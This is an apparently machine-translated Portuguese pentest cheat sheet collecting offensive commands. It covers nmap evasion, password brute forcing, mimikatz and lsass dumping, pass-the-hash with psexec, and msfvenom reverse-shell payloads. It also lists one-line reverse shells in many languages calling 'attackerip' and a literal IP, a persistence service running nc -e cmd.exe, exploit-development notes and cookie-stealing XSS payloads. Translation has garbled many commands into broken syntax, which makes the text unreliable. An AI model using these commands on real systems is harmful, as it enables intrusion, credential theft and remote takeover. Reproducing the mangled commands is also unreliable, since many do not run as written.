Testes de penetração no mundo real

Um teste de penetração (pentest for short) é um método de atacar os sistemas de um computador na esperança de encontrar fraquezas em sua segurança. Se o pentest obtiver acesso, ele mostra que a funcionalidade e os dados do computador podem ser comprometidos. 
Os testes de penetração servem uma variedade de propósitos valiosos. Um dos principais objetivos é encontrar vulnerabilidades que são difíceis de detectar

sistemas de segurança automáticos. Além disso, eles determinam o impacto de ataques em sistemas de computador, testam sistemas de defesa da rede e fornecem detalhes necessários para suportar um aumento nas despesas com tecnologia de segurança. Aqui está o comando / ferramenta de lista que foi usado em seus testes de penetração.

A melhor estratégia de digitalização NMAP

# Aplicar a melhor estratégia de digitalização do nmap para todas as redes de tamanho

#Host discovery, gera uma lista de hosts sobreviventes

$ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24 
$ grep "Status: Up" Discovery.gnmap | corte -f 2 -d ''> LiveHosts.txt

# http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf

$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt 
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

# Port encontrado, encontrou todas as portas, mas a varredura da porta UDP será muito lenta

$ nmap -sS -T4 -Pn -top-ports 3674 -oG 3674 -iL LiveHosts.txt 
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt 
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

# Exibe a porta TCP / UDP

$ grep "abrir" FullTCP | cut -f 1 -d '' | classifique -nu | corte -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{imprimir "T:" $ 0}' 
$ grep "abrir" FullUDP | cut -f 1 -d '' | classifique -nu | corte -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "U:" $ 0} "

# Detectar a versão do serviço

$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt 
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt 
$ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt

Nmap para evitar o firewall

# Segmentação 
$ nmap -f 
# Modifique o tamanho MTU padrão, mas deve ser um múltiplo de 8 (8, 16, 24, 32, etc.) 
$ nmap -mtu 24 
# Gerar números aleatórios de falsificação 
$ nmap -D RND: 10 [alvo] 
# Especificar manualmente o IP para ser falsificado 
$ nmap -D decoy1, decoy2, decoy3 etc. 
# Scanner de botnet, primeiro precisa encontrar o botnet IP 
$ nmap -sI [Zombie IP] [Target IP] 
# Terminal de origem designado 
$ nmap -source-port 80 IP 
# Adicionar um número aleatório de dados após cada digitalização 
$ nmap -data-length 25 IP 
# Erro de endereço MAC, você pode gerar endereço MAC do host diferente 
$ nmap -spoof-mac Dell / Apple / 3Com IP

Escala de vulnerabilidades do Nmap para Web

cd / usr / share / nmap / scripts / 
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz 
nmap -sS -sV - script = vulscan / vulscan.nse target 
nmap -sS -sV -script = vulscan / vulscan.nse -script-args vulscandb = scipulus.csv target 
nmap -sS -sV -script = vulscan / vulscan.nse -script-args vulscandb = scipulus.csv -p80 target 
nmap -PN -sS -sV -script = vulscan -script-args vulscancorrelation = 1 -p80 target 
nmap -sV -script = vuln target 
nmap -PN -sS -sV -script = all -script-args vulscancorrelation = 1 target

Scanner de caminho da Web

Dirsearch 
DirBuster

Patrocinador - Contratos de adivinhação de senha

# git clone https://github.com/lanjelot/patator.git / usr / share / patator 
$ patator smtp_login host = 192.168.17.129 usuário = Ololena senha = FILE0 0 = / usr / share / john / password.lst 
$ patator smtp_login host = 192.168.17.129 usuário = FILE1 senha = FILE0 0 = / usr / share / john / password.lst 1 = / usr / share / john / usernames.lst 
$ patator smtp_login host = 192.168.17.129 helo = 'ehlo 192.168. 17.128 'user = FILE1 password = FILE0 0 = / usr / share / john / password.lst 1 = / usr / share / john / usernames.lst 
$ patator smtp_login host = 192.168.17.129 usuário = Ololena senha = FILE0 0 = / usr /share/john/password.lst -x ignore: fgrep = 'senha incorreta ou nome da conta'

Use Fierce to brute DNS

Nota: Fierce verifica se o servidor DNS permite transferências de zona. Se permitido, uma transferência de zona é feita e o usuário é notificado. Caso contrário, o nome do host pode ser enumerado consultando o servidor DNS.

# http://ha.ckers.org/fierce/ 
$ ./fierce.pl -dns example.com 
$ ./fierce.pl -dns example.com -wordlist myWordList.txt

Use Nikto para verificar serviços da Web

nikto -C all -h http: // IP

WordPress scan
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan 
./wpscan -url http: // IP / -enumerar p

Identificação de impressão digital HTTP

wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip 
cd httprint_301 / linux / 
./httprint -h http: // IP -s signatures.txt

Scan with Skipfish

Nota: Skipfish é uma ferramenta de detecção de segurança de aplicativos da Web, a Skipfish usará rastreador recursivo e sonda baseada em dicionário para gerar um mapa de site interativo, o mapa resultante será gerado após a saída de verificação de segurança.

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http: // IP

Use a análise NC

nc -v -w 1 target -z 1-1000 
para i em {101..102}; do nc -vv -n -w 1 192.168.56. $ i 21-25 -z; feito

Unicornscan

NOTA: O Unicornscan é uma ferramenta para a coleta de informações e auditorias de segurança.

us -H -msf -Iv 192.168.56.101 -p 1-65535 
us -H -mU -Iv 192.168.56.101 -p 1-65535

Use o Xprobe2 para identificar a impressão digital do sistema operacional

xprobe2 -v -p tcp: 80: abrir IP 
Enumeração de Samba

nmblookup -um alvo 
smbclient // MOUNT / share -I target -N 
rpcclient -U "" target 
enum4linux target

Enumera SNMP

Snmpget -v 1 -c IP 
Snmpwalk público -v 1 -c public IP 
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Comando personalizado do Windows cmd

net localgroup Usuários 
net localgroup Administradores 
search dir / s * .doc 
system ("start cmd.exe / k $ cmd") 
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe "start = auto error = ignore 
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92.17.103 7779 
mimikatz.exe" privilégio :: debug "" log "" sekurlsa :: logonpasswords " 
Procdump.exe -accepteula -ma lsass.exe lsass.dmp 
mimikatz.exe" sekurlsa :: minidump lsass.dmp "" log "" sekurlsa :: logonpasswords " 
C: \ temp \ procdump.exe -accepteula - ma lsass.exe lsass.dmp 32 
C: \ temp \ procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64

PuTTY conecta o túnel

Encaminhe a porta remota para o endereço de destino 
plink.exe -P 22 -l root -pw "1234" -R 445: 127.0.0.1: 445 IP

Encaminhamento da porta Meterpreter

# https://www.offensive-security.com/metasploit-unleashed/portfwd/ 
# Encaminhe a porta remota para o 
contador de endereço de destino > admin. add -l 3389 -p 3389 -r 172.16.194.141 
kali> rdesktop 127.0.0.1: 3389

Habilitar o serviço RDP

reg adicionar "hklm \ system \ currentcontrolset \ control \ terminal server" / f / v fDenyTSConnections / t REG_DWORD / d 0 
netsh firewall set service remoteadmin habilitar 
netsh firewall set service remotedesktop enable

Feche o firewall do Windowsnetsh defina o opmode desativado

Meterpreter VNC / RDP

# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/ 
execute getgui -u admin -p 1234 
execute vnc -p 5043

Use Mimikatz

Obtém a senha do nome de usuário de texto simples do Windows

git clone https://github.com/gentilkiwi/mimikatz.git 
privilégio :: debug 
sekurlsa :: logonPasswords cheio

Obtém um valor de hash

git clone https://github.com/byt3bl33d3r/pth-toolkit 
pth-winexe -U hash // IP cmd

ou

apt-get install freerdp-x11 
xfreerdp / u: offsec / d: win2012 / pth: HASH / v: IP

ou

metropreter> executar post / windows / gather / hashdump 
Administrador: 500: e52cac67419a9a224a3b108f3fa6cb6d: 8846f7eaee8fb117ad06bdd830b7586c ::: 
msf> use exploit / windows / smb / psexec 
msf exploit (psexec)> set payload windows / meterpreter / reverse_tcp 
msf exploit (psexec)> set SMBPass e52cac67419a9a224a3b108f3fa6cb6d: 8846f7eaee8fb117ad06bdd830b7586c 
msf exploit (psexec)> exploit 
meterpreter> shell

Use o Hashcat para criar senhashashcat -m 400 -a 0 hash /root/rockyou.txt

Use o NC para obter informações da Banner

nc 192.168.0.10 80 
GET / HTTP / 1.1 
Host: 192.168.0.10 
User-Agent: Mozilla / 4.0 
Referrer: www.example.com 
<enter> 
<enter>

Use NC para saltar o shell no Windows

c:> nc -Lp 31337 -vv -e cmd.exe 
nc 192.168.0.10 31337 
c:> nc example.com 80 -e cmd.exe 
nc -lp 80

nc -lp 31337 -e / bin / bash 
nc 192.168.0.10 31337 
nc -vv -r (aleatório) -w (espera) 1 192.168.0.10 -z (erro i / o) 1-1000

Procure o arquivo raiz SUID / SGID

# Localizar o arquivo raiz SUID 
encontrar / -user root -perm -4000 -print

# Localize o arquivo raiz do SGID: 
find / -group root -perm -2000 -print

# Localizar os arquivos SUID e SGID: 
find / -perm -4000 -o -perm -2000 -print

# Encontre arquivos que não pertencem a nenhum usuário: 
find / -nouser -print

# Localizar um arquivo que não pertence a nenhum grupo de usuários: 
find / -nogroup -print

# Encontre links flexíveis e aponte para: 
encontrar / -type l -ls

Shell de pitão

python -c 'import pty; pty.spawn ("/ bin / bash")'

Servidor HTTP Python \ Ruby \ PHP

python2 -m SimpleHTTPServer 
python3 -m http.server 
ruby -rwebrick -e "WEBrick :: HTTPServer.new (: Port => 8888, 😀 
ocumentRoot => Dir.pwd) .start" 
php -S 0.0.0.0:8888

Obtém o PID correspondente ao processo

fuser -nv tcp 80 
fuser -k -n tcp 80

Use Hydra para quebrar RDP

hydra -l admin -P / root / Desktop / senhas -S XXXX rdp

Monte a pasta compartilhada remota do Windows

smbmount // XXXX / c $ / mnt / remote / -o nome de usuário = usuário, senha = pass, rw

Under Kali compile Exploit

gcc -m32 -o output32 hello.c 
gcc -m64 -o saída hello.c

Compile Windows Exploit sob Kali

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download 
vinho mingw-get-setup.exe 
selecione mingw32-base 
cd / root /.wine/drive_c/windows 
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip 
cd /root/.wine/drive_c/MinGW/bin 
wine gcc -o ability.exe / tmp / exploit. c -lwsock32 
wine ability.exe

Comando NASM

Nota: O NASM, o Netwide Assembler, é uma plataforma de 80 x 86 e x86-64 com base no compilador de linguagem assembly, projetado para alcançar o programa compilador multi-plataforma e recursos modulares.

nasm -f bin -o payload.bin payload.asm 
nasm -f elf payload.asm; ld -o carga útil carga útil; Objdump -d carga útil

Penetração SSH

ssh -D 127.0.0.1:1080 -p 22 usuário @ IP 
Adicionar socks4 127.0.0.1 1080 in /etc/proxychains.conf 
proxychains comandos alvo 
SSH penetra de uma rede para outra

ssh -D 127.0.0.1:1080 -p 22 user1 @ IP1 
Adicionar socks4 127.0.0.1 1080 in /etc/proxychains.conf 
proxychains ssh -D 127.0.0.1.11010 -p 22 user1 @ IP2 
Adicionar socks4 127.0.0.1 1081 in / etc / proxychains.conf 
proxychains comandos alvo

Use metasploit para penetração

# https://www.offensive-security.com/metasploit-unleashed/pivoting/ 
meterpreter> ipconfig 
Endereço IP: 10.1.13.3 
meterpreter> executar autoroute -s 10.1.13.0/24 
meterpreter> executar autoroute -p 
10.1.13.0 255.255. 255.0 Session 1 
meterpreter> Ctrl + Z 
msf auxiliar (tcp)> use exploit / windows / smb / psexec 
msf exploit (psexec)> configure RHOST 10.1.13.2 
msf exploit (psexec)> exploit 
meterpreter> ipconfig 
Endereço IP: 10.1.13.2

Exploit-DB com base no arquivo CSV

git clone https://github.com/offensive-security/exploit-database.git 
cd exploit-database 
./searchsploit -u 
./searchsploit apache 2.2 
./searchsploit "Linux Kernel"

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<| <=" | classifique -k3

Cargas úteis MSF

msfvenom -p windows / meterpreter / reverse_tcp LHOST = <Endereço IP> X> system.exe 
msfvenom -p php / meterpreter / reverse_tcp LHOST = <Endereço IP> LPORT = 443 R> exploit.php 
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <Endereço IP> LPORT = 443 -e -a x86 -platform win -f asp -o file.asp 
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <Endereço IP> LPORT = 443 -e x86 / shikata_ga_nai -b "\ x00 "-a x86 -platform win -fc

MSF gera o Meterpreter Shell que salta sob Linuxmsfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <Endereço IP> LPORT = 443 -e -f elf -a x86 -platform linux -o shell

MSF build bounce Shell (C Shellcode)msfvenom -p windows / shell_reverse_tcp LHOST = 127.0.0.1 LPORT = 443 -b "\ x00 \ x0a \ x0d" -a x86 -platform win -fc

MSF gera um salto Python Shellmsfvenom -p cmd / unix / reverse_python LHOST = 127.0.0.1 LPORT = 443 -o shell.py

MSF cria rebote ASP Shellmsfvenom -p windows / meterpreter / reverse_tcp LHOST = <Seu endereço IP> LPORT = <Sua porta para conectar-se> -f asp -a x86 -platform win -o shell.asp

MSF gera shells de saltomsfvenom -p cmd / unix / reverse_bash LHOST = <Seu endereço IP> LPORT = <Your Port to Connect On> -o shell.sh

MSF build bounces PHP Shell
msfvenom -p php / meterpreter_reverse_tcp LHOST = <Seu endereço IP> LPORT = <Sua porta para conectar-se> -o shell.php 
adicionar <? Php no início 
perl -i ~ -0777pe's / ^ / <? php \ n / 'shell.php

MSF gera saltar Win Shellmsfvenom -p windows / meterpreter / reverse_tcp LHOST = <Seu endereço IP> LPORT = <Sua porta para conectar-se> -f exe -a x86 -platform win -o shell.exe

Comandos de segurança comumente usados ​​no Linux

encontrar / -uid 0 -perm -4000

encontrar / -perm -o = w

find / -name "" -print 
find / -name ".." -print 
find / -name ". "-print 
find / -name" "-print

find / -nouser

lsof + L1

lsof -i

arp -a

Get passwd

grupo de pessoas

para o usuário em $ (getent passwd | cut -f1 -d :); faça eco "### Crontabs para $ user ####"; crontab -u $ user -l; feito

gato / dev / urandom | tr -dc 'a-zA-Z0-9 -_! @ # $% ^ & * () _ + {} |: <>? =' | fold -w 12 | cabeça-4

encontrar . | xargs -I arquivo lsattr -a arquivo 2> / dev / null | grep '^ ... .i' 
chattr -i arquivo

Excesso do buffer do Windows explora 

msfvenom -p windows / shell_bind_tcp -a x86 -platform win -b "\ x00" -fc 
msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = 443 -a x86 -platform win -e x86 / shikata_ga_nai -b "\ x00 "-fc

CARACTERES MAIS COMO USADOS:

\ x00 \ x0a \ x0d \ x20 Para solicitação http 
\ x00 \ x0a \ x0d \ x20 \ x1a \ x2c \ x2e \ 3a \ x5c Finalização com (0 \ n \ r_)

# Comando regular: 
padrão de 
compensação de padrão do padrão de compensação do padrão (endereço EIP) 
(endereço ESP) 
adicione o lixo até o valor EIP e adicione (endereço ESP JMP) no EIP. (ESP = shellcode)

! pvefindaddr pattern_create 5000 
! pvefindaddr sugere 
! módulos 
pvefindaddr! pvefindaddr nosafeseh

! mona config -set workingfolder C: \ Mona \% p 
! mona config -get workingfolder 
! mona mod 
! mona bytearray -b "\ x00 \ x0a" 
! mona pc 5000 
! mona po EIP 
! mona sugerem

SEH - Gerenciamento de exceções estruturadas

Nota: SEH ("Gerenciamento de Exceção Estruturada"), ou manipulação de exceção estruturada, é um poderoso erro de processador ou arma de exceção fornecida pelo sistema operacional Windows ao programador.

# https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH 
# http://baike.baidu.com/view/243131.htm 
! mona sugere 
! mona nosafeseh 
nseh = "\ xeb \ x06 \ x90 \ x90 "(próxima cadeia seh) 
iseh =! pvefindaddr p1 -n -o -i (POP POP RETRUN ou POPr32, POPr32, RETN)

ROP (DEP)

Nota: ROP ("Programação orientada para o retorno") é uma tecnologia de exploração de segurança do computador que permite que um invasor execute código, como memória não executável e assinaturas de código, em uma situação de defesa de segurança.

O DEP ("Prevenção de Execução de Dados") é um conjunto de tecnologia de hardware e software, em memória, para distinguir estritamente entre código e dados para evitar que os dados sejam executados em código.

# https://en.wikipedia.org/wiki/Return-oriented_programming 
# https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5% 90% 91% E7% BC% 96% E7% A8% 8B 
# https://en.wikipedia.org/wiki/Data_Execution_Prevention 
# http://baike.baidu.com/item/DEP/7694630 
! Mona modules 
! Mona ropfunc -m * .dll -cpb "\ x00 \ x09 \ x0a" 
! mona rop -m * .dll -cpb "\ x00 \ x09 \ x0a" (sugestão automática)

ASLR - Aleatorização do formato do espaço de endereços
# https://en.wikipedia.org/wiki/Address_space_layout_randomization 
!mona noaslr 
EGG Hunter technology

Caça ao ovo Esta técnica pode ser categorizada como um "shellcode graduado", que basicamente o ajuda a encontrar seu shellcode (maior) (nosso "ovo") com um shellcode pequeno e especialmente criado, em busca do nosso shellcode final. Em outras palavras, um código curto é executado primeiro, depois passa para o shellcode real e o executa. - Fazendo referência para ver Ice Forum, mais detalhes podem ser encontrados no link de código que eu adiciono comentários.

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ 
# http://www.pediy.com/kssd/ pediy12 / 116190/831793 / 45248.pdf 
# http://www.fuzzysecurity.com/mdeutações/expDev/4.html 
! mona jmp -r esp 
! mona egg -t lxxl 
\ xeb \ xc4 (salto para trás -60) 
buff = lxxllxxl + shell 
! mona egg -t 'w00t'

Comandos GDB Debugger comumente usados

pisar * _start 
próximo 
passo 
n 
s 
continuar 
c

# 
Verificar dados 'REGISTERS' e 'MEMORY'

# Exibe os valores do registro: (Decimal, Binário, Hex) 
print / d -> 
Impressão decimal / t -> 
Impressão binária / x -> Hex 
O / P: 
(gdb) print / d $ eax 
$ 17 = 13 
(gdb) print / t $ eax 
$ 18 = 1101 
(gdb) print / x $ eax 
$ 19 = 0xd 
(gdb)

# Exibe o valor de um 
comando de endereço de memória específico : x / nyz (Examine) 
n -> Número de campos para exibir ==> 
y -> Formato para saída ==> c (caractere), d (decimal), x (Hexadecimal ) 
z -> Tamanho do campo a ser exibido ==> b (byte), h (halfword), w (palavra 32 Bit)

BASH rebound Shell

bash -i> & / dev / tcp / XXXX / 443 0> & 1

exec / bin / bash 0 & 0 2> & 0 
exec / bin / bash 0 & 0 2> & 0

0 <& 196; exec 196 <> / dev / tcp / attackerip / 4444; sh <& 196> & 196 2> & 196

0 <& 196; exec 196 <> / dev / tcp / attackerip / 4444; sh <& 196> & 196 2> & 196

exec 5 <> / dev / tcp / attackerip / 4444 cat <& 5 | enquanto lê linha; do $ line 2> & 5> & 5; feito # ou: enquanto lê a linha 0 <& 5; do $ line 2> & 5> & 5; feito 
exec 5 <> / dev / tcp / attackerip / 4444

gato <& 5 | enquanto lê linha; do $ line 2> & 5> & 5; feito # ou: 
enquanto lê a linha 0 <& 5; do $ line 2> & 5> & 5; feito

/ bin / bash -i> / dev / tcp / attackerip / 8080 0 <& 1 2> & 1 
/ bin / bash -i> / dev / tcp / XXXX / 443 0 <& 1 2> & 1

PERL rebote Shell

perl -MIO -e '$ p = fork; saída, se ($ p); $ c = novo IO :: Socket :: INET (PeerAddr, "attackerip: 443"); STDIN-> fdopen ($ c, r) ; $ ~ -> fdopen ($ c, w); sistema $ _ enquanto <>; '

# Win plataforma 
perl -MIO -e '$ c = novo IO :: Socket :: INET (PeerAddr, "attackerip: 4444"); STDIN-> fdopen ($ c, r); $ ~ -> fdopen ($ c, w); sistema $ _ enquanto <>; ' 
perl -e 'use Socket; $ i = "10.0.0.1"; $ p = 1234; socket (S, PF_INET, SOCK_STREAM, getprotobyname ("tcp")); se (conectar (S, sockaddr_in ($ p, inet_aton ( $ i)))) {abrir (STDIN, "> & S"); abrir (STDOUT, "> & S"); abrir (STDERR, "> & S"); exec ("/ bin / sh -i");} ; '

RUBY rebote Shell

Ruby -rsocket -e 'exit if fork; c = TCPSocket.new ("attackerip", "443"), enquanto (cmd = c.gets); IO.popen (cmd, "r") {| io | c. imprima io.read} end '

# Win platform 
ruby -rsocket -e 'c = TCPSocket.new ("attackerip", "443"), enquanto (cmd = c.gets); IO.popen (cmd, "r") {| io | c.print io.read} end ' 
ruby -rsocket -e' f = TCPSocket.open ("attackerip", "443"). to_i; exec sprintf ("/ bin / sh -i <&% d> &% d 2> & % d ", f, f, f) '

PYTHON rebote Shell

python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect (("attackerip", 443)); os.dup2 (s.fileno (), 0 ); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/ bin / sh", "- i"]); '

PHP Bounce Shell

php -r '$ sock = fsockopen ("attackerip", 443); exec ("/ bin / sh -i <& 3> & 3 2> & 3");'

JAVA rebote Shell

r = Runtime.getRuntime () 
p = r.exec (["/ bin / bash", "- c", "exec 5 <> / dev / tcp / attackerip / 443; cat <& 5 | while read line; do \ $ line 2> & 5> & 5; done "] como String []) 
p.waitFor ()

NETCAT rebote Shell

nc -e / bin / sh attackerip 4444 
nc -e / bin / sh 192.168.37.10 443

# Se o parâmetro -e estiver desativado, você pode tentar o seguinte comando 
# mknod backpipe p && nc attackerip 443 0 <backpipe | / bin / bash 1> backpipe 
/ bin / sh | nc attackerip 443 
rm -f / tmp / p; mknod / tmp / pp && nc attackerip 4443 0 / tmp /

# Se você instalou a versão errada do netcat, experimente o seguinte comando 
rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc attackerip> / tmp / f

TELNET rebote Shell

# Se o netcat não está disponível 
mknod backpipe p && telnet attackerip 443 0 <backpipe | / bin / bash 1> backpipe

XTERM rebote Shell

# Ative o servidor X (: 1 - escute na porta TCP 6001) 
apt-get install xnest 
Xnest: 1

# Lembre-se de autorizar a conexão a partir do alvo IP 
xterm -display 127.0.0.1:1

# Conceda acesso 
xhost + targetip

# Conecte novamente ao nosso servidor X na máquina de destino 
xterm -display attackerip: 1 
/ usr / openwin / bin / xterm -display attackerip: 1 
ou 
$ DISPLAY = attackerip: 0 xterm

XSS

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 
("<iframes> src = http: // IP: PORT </ iframes>")

<script> document.location = http: // IP: PORT </ script>

'; alerta (String.fromCharCode (88,83,83)) // \'; alerta (String.fromCharCode (88,83,83)) // "; alerta (String.fromCharCode (88,83,83)) // \ "; alerta (String.fromCharCode (88,83,83)) // -> </ SCRIPT>"> '> <SCRIPT> alerta (String.fromCharCode (88,83,83)) </ SCRIPT>

";! -" <XSS> = & amp; amp; {()}

<IMG SRC = "javascript: alert ('XSS');"> 
<IMG SRC = javascript: alerta ('XSS')> 
<IMG "" "> <SCRIPT> alerta (" XSS ") </ SCRIPT>" " > 
<IMG SRC = & amp; amp; # 106; & amp; amp; # 97; & amp; amp; # 118; & amp; amp; amp; amp; amp; # 115; amp; amp; # 99; amp ; # 114; & amp; amp; # 105; & amp; amp; # 112; & amp; amp; # 116; & amp; amp; # 58; & amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; amp; # 101; & amp; amp; # 114; & amp; amp; # 116; & amp; amp; # 40; & amp; amp; # 39; & amp; amp; # 88; & amp; amp; # 83; & amp; amp; # 83; & amp; amp; amp; amp; amp; amp; amp; amp; amp; amp;

<IMG SRC = & amp; amp; # 0000106 & amp; amp; # 0000097 & amp; amp; amp; # 0000118 & amp; amp; # 0000097 & amp; amp; # 0000115 & amp; amp; amp; 0000099 & amp; amp; # 0000114 & amp; amp; # 0000105 & amp; amp; 0000112 & amp ; amp; # 0000116 & amp; amp; # 0000058 & amp; amp; amp; 0000097 & amp; amp; # 0000108 & amp; amp; # 0000101 & amp; amp; 0000114 & amp; amp; amp; 0000116 & amp; amp; 0000040 & amp; amp; 0000039 & amp; amp; 0000088 & amp ; amp; # 0000083 & amp; amp; # 0000083 & amp; amp; # 0000039 & amp; amp; # 0000041> 
<IMG SRC = "jav ascript: alerta ('XSS');">

perl -e 'print "<IMG SRC = javascript: alerta (\" XSS \ ")>";' > sair

<BODY onload! # $% & Amp; () * ~ + -_.,:;? @ [/ | \] ^ `= Alerta (" XSS ")>

("> <Iframes http://google.com <iframes>)

<BODY BACKGROUND = "javascript: alert ('XSS')"> 
<FRAMESET> <FRAME SRC = "javascript: alert ('XSS');"> </ FRAMESET> 
"> <script> alert (document.cookie) < / script> 
% 253cscript% 253ealert (document.cookie)% 253c / script% 253e 
"> <s"% 2b "cript> alerta (document.cookie) </ script> 
% 22 /% 3E% 3CBODY% 20onload = 'document .write (% 22% 3Cs% 22% 2b% 22cript% 20src = http: //my.box.com/xss.js%3E%3C/script%3E%22) '% 3E 
<img src = asdf onerror = alerta (document.cookie)>

SSH Over SCTP (usando Socat)

$ socat SCTP-LISTEN: 80, fork TCP: localhost: 22 
$ socat TCP-LISTEN: 1337, fork SCTP: SERVER_IP: 80 
$ ssh -lusername localhost -D 8080 -p 1337

Metagoofil - Ferramenta de coleta de metadados

Nota: Metagoofil é uma ferramenta para coletar informações usando o Google. 
$ python metagoofil.py -d example.com -t doc, pdf -l 200 -n 50 -o examplefiles -f results.html

Use um túnel de DNS para ignorar o firewall

$ apt-get update 
$ apt-get -y install ruby-dev git make g ++ 
$ gem install bundler 
$ git clone https://github.com/iagox86/dnscat2.git 
$ cd dnscat2 / server 
$ pacote instalação 
$ ruby ​​./ dnscat2.rb 
dnscat2> Nova sessão estabelecida: 16059 
dnscat2> session -i 16059

# https://downloads.skullsecurity.org/dnscat2/ 
# https://github.com/lukebaggett/dnscat2-powershell 
$ dnscat -host <dnscat server_ip>